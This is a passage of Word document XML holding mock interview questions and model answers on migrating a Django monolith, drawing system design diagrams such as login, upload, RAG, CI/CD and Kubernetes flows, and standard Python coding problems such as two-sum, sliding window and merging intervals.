      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Scenario: You need to migrate a monolithic Django app to services without stopping product delivery. What migration plan would you propose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with a modular monolith cleanup: clear boundaries, domain ownership, tests, and observability. Choose one low-risk bounded context, expose APIs/events, and use the strangler pattern to route that capability to a new service while the monolith still runs. Keep shared database changes careful, prefer backward-compatible contracts, migrate data incrementally, and use feature flags. Avoid splitting everything at once; measure reliability and team velocity after each extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Scenario: You are asked to review a proposed full-stack AI application before launch. What risks, tradeoffs, and readiness checks would you cover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scenario/Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Review functional requirements, data flow, auth, tenant isolation, threat model, PII handling, model/provider choice, RAG quality, prompt injection risk, cost controls, latency SLOs, fallback behavior, observability, evals, CI/CD, rollback, database migrations, capacity, and incident runbooks. Ask what can fail, who is impacted, how it is detected, how it is mitigated, and what evidence proves the system is ready for production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 57 - Diagram-Based System Design Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Draw and explain a high-level architecture diagram for a full-stack Python application with React, FastAPI, PostgreSQL, Redis, workers, and object storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Show Browser/React -&gt; CDN or frontend hosting -&gt; API Gateway/Ingress -&gt; FastAPI -&gt; PostgreSQL, Redis, Object Storage, and Queue -&gt; Worker. Explain synchronous request paths separately from async processing. Label auth, secrets, observability, autoscaling, backups, and failure points. A simple diagram can use boxes for services and arrows for data flow, with Redis for cache/session/rate limit and workers for slow jobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Draw the request flow for user login from browser to backend, database, token/session creation, and frontend state update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw Browser -&gt; Login API -&gt; User table/password verification -&gt; session/JWT creation -&gt; secure cookie or token response -&gt; frontend state update -&gt; protected API call. Mention password hashing, rate limiting, MFA if needed, CSRF for cookie auth, refresh-token rotation, audit logging, and server-side authorization on every protected request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Draw a file upload and async processing architecture using signed URLs, object storage, a queue, workers, and status tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Upload Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw Browser -&gt; API creates upload record -&gt; API returns signed URL -&gt; Browser uploads to object storage -&gt; storage event/finalize call -&gt; queue -&gt; worker -&gt; status table -&gt; frontend polls or receives updates. Explain why large files should bypass the API, and include validation, virus scanning, retries, dead-letter queue, encryption, and access control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Draw a RAG architecture diagram showing document ingestion, chunking, embeddings, vector database, retrieval, prompt construction, LLM call, and citations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw ingestion flow and query flow separately. Ingestion: documents -&gt; parser -&gt; chunks -&gt; embeddings -&gt; vector DB with metadata. Query: user question -&gt; embedding -&gt; vector search/filter -&gt; retrieved chunks -&gt; prompt builder -&gt; LLM -&gt; answer with citations. Add permissions, freshness, evaluation, logging, token cost, and feedback loop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Draw a CI/CD pipeline diagram for a Python full-stack app from pull request to production deployment and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/CI-CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw PR -&gt; lint/test/security scan -&gt; build frontend/backend images -&gt; push registry -&gt; deploy staging -&gt; smoke tests -&gt; approval -&gt; production rollout -&gt; monitor -&gt; rollback. Include database migration checks, artifact promotion, image scanning, environment config, deployment markers, feature flags, and rollback to the previous image or revision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Draw a Kubernetes deployment diagram for frontend, backend API, worker, Redis, managed PostgreSQL, ingress, secrets, and autoscaling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw Ingress/TLS -&gt; frontend Service and backend Service -&gt; backend Deployment -&gt; Redis/managed cache, managed PostgreSQL, object storage, and queue -&gt; worker Deployment. Add ConfigMaps, Secrets, ServiceAccounts, HPA, readiness/liveness probes, network policies, and observability sidecars/agents if used. Prefer managed databases over running PostgreSQL in the app namespace for production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Draw an observability diagram showing metrics, logs, traces, dashboards, alerts, and incident response flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw application services emitting logs, metrics, and traces to collectors/agents, then to monitoring/logging/tracing backends. Dashboards read from telemetry stores, monitors trigger alerts, alerts route to Slack/PagerDuty, and runbooks guide responders. Include correlation IDs, deployment markers, SLO dashboards, and feedback from incidents into backlog improvements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Draw a sequence diagram for a user asking an AI assistant a question and receiving a streamed answer with citations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Sequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Show User -&gt; Frontend -&gt; Chat API -&gt; Retriever -&gt; Vector DB -&gt; Prompt Builder -&gt; LLM -&gt; streaming response -&gt; Frontend. Also show metadata logging, citation lookup, safety checks before and after generation, and feedback capture. In a sequence diagram, order matters: retrieval happens before prompt construction, and streaming begins after the LLM starts producing tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Draw a failure-handling diagram for an unreliable third-party API using retries, queues, idempotency keys, dead-letter queues, and reconciliation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Resilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw API request -&gt; durable job queue -&gt; worker -&gt; third-party API. On transient failure, retry with backoff and jitter. On repeated failure, send to dead-letter queue and mark status failed/pending. Use idempotency keys to prevent duplicate side effects, and add reconciliation jobs to compare local state with provider state. Show user-visible statuses like pending, completed, or failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Draw a multi-tenant SaaS security diagram showing auth, tenant isolation, database scoping, cache scoping, audit logs, and admin access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Draw identity provider -&gt; backend auth middleware -&gt; tenant resolver -&gt; policy checks -&gt; database queries scoped by tenant_id or row-level security. Show cache keys containing tenant scope, object storage paths scoped by tenant, audit logs for sensitive actions, and admin access through separate privileged workflows. Emphasize that tenant isolation must be enforced server-side, not only in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Draw how the architecture changes when traffic grows from 1,000 users to 1 million users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Scaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with one frontend, API, database, cache, and worker. At higher scale add CDN, load balancer, horizontal API replicas, Redis cache, async queues, read replicas, database indexes/partitioning, autoscaling workers, object storage, rate limiting, observability, and SLOs. Explain each change as solving a bottleneck, not as adding complexity by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. In a system design interview, how do you present a diagram clearly while explaining tradeoffs, bottlenecks, and failure modes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Diagram/Interview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with requirements and scale, then draw the main user flow left to right. Keep boxes high-level first, then zoom into storage, async jobs, caching, security, and observability. Label data stores and protocols, explain why each component exists, call out bottlenecks and failure modes, and discuss tradeoffs such as consistency vs availability, cost vs latency, and build vs managed service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 58 - LeetCode and HackerRank Style Python Practice Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Practice problem: Given an array of integers and a target, return indices of two numbers that add up to the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Arrays</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a dictionary mapping value to index. For each number, compute complement = target - value and check if complement is already seen. If yes, return the two indices; otherwise store the current value and index. Time complexity is O(n), space complexity is O(n). Test duplicates, negative numbers, and no-solution behavior if the prompt allows it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Practice problem: Given a string, find the first non-repeating character.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Count characters with collections.Counter or a dictionary, then scan the string again and return the first character whose count is 1. This preserves order and is O(n) time with O(k) space where k is the number of distinct characters. Clarify whether spaces, case, and punctuation count.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Practice problem: Group a list of words into anagram groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a dictionary where the key is either sorted(word) or a 26-count tuple for lowercase English letters. Append each word to the group for that key. Sorting is simple and costs O(m log m) per word; count tuples can be O(m). Return the dictionary values as groups. Clarify case sensitivity and character set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Practice problem: Find the maximum sum of any subarray of size k.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Sliding Window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a fixed-size sliding window. Sum the first k elements, then slide one step at a time by adding the new right element and subtracting the old left element, tracking the maximum. This is O(n) time and O(1) extra space. Validate k &lt;= len(nums) and behavior for negative numbers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Practice problem: Given a sorted array, remove duplicates in place and return the new length.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Two Pointers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use two pointers. Keep write at the position for the next unique value, scan read from left to right, and copy nums[read] to nums[write] when it differs from the previous unique value. Return write. Time is O(n), space is O(1). This pattern is common for in-place array compaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Practice problem: Validate whether a string containing brackets is balanced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a stack for opening brackets and a map from closing to opening brackets. Push opens. For each close, the stack must be non-empty and top must match; otherwise return false. At the end, return true only if the stack is empty. Time O(n), space O(n).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Practice problem: Implement a moving average over the last k values in a stream.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Queue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use collections.deque to store the last k values and keep a running sum. On each new value, append it and add to sum; if size exceeds k, popleft and subtract. The average is sum divided by current window size. Each operation is O(1). Avoid recomputing sum over the full window every time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Practice problem: Reverse a singly linked list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Linked List</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use three pointers: prev = None, curr = head, and next_node. Iterate while curr exists: save curr.next, set curr.next = prev, move prev to curr, and curr to next_node. Return prev as the new head. Time O(n), space O(1). Also mention a recursive version but iterative is safer for Python recursion limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Practice problem: Search for a target in a sorted rotated array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Binary Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use modified binary search. At each mid, determine which half is sorted. If the target lies within the sorted half, move into it; otherwise search the other half. This keeps O(log n) time and O(1) space. Clarify whether duplicates exist, because duplicates complicate the sorted-half decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Practice problem: Return the level-order traversal of a binary tree.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Trees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use BFS with collections.deque. Start with root, process one level at a time by reading the current queue length, append node values to a level list, and enqueue children. Return the list of levels. Time O(n), space O(w), where w is the maximum tree width.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Practice problem: Count the number of islands in a 2D grid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Graphs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scan every cell. When you find land that is not visited, increment count and run DFS or BFS to mark all connected land cells. Connectivity is usually four-directional unless stated otherwise. Time O(rows * cols), space O(rows * cols) worst case for visited/recursion/queue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Practice problem: Find the kth largest element in an unsorted array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Heap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a min-heap of size k: push each number and pop when size exceeds k, leaving the kth largest at heap[0]. Time O(n log k), space O(k). Alternatives are sorting O(n log n) or quickselect average O(n). In Python, heapq is a min-heap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Practice problem: Merge overlapping intervals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Sorting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Sort intervals by start, then iterate and maintain a merged list. If the next interval starts before or at the current merged end, extend the end; otherwise append a new interval. Sorting dominates at O(n log n), with O(n) output space. Clarify whether touching intervals like [1,2] and [2,3] should merge.</w:t>
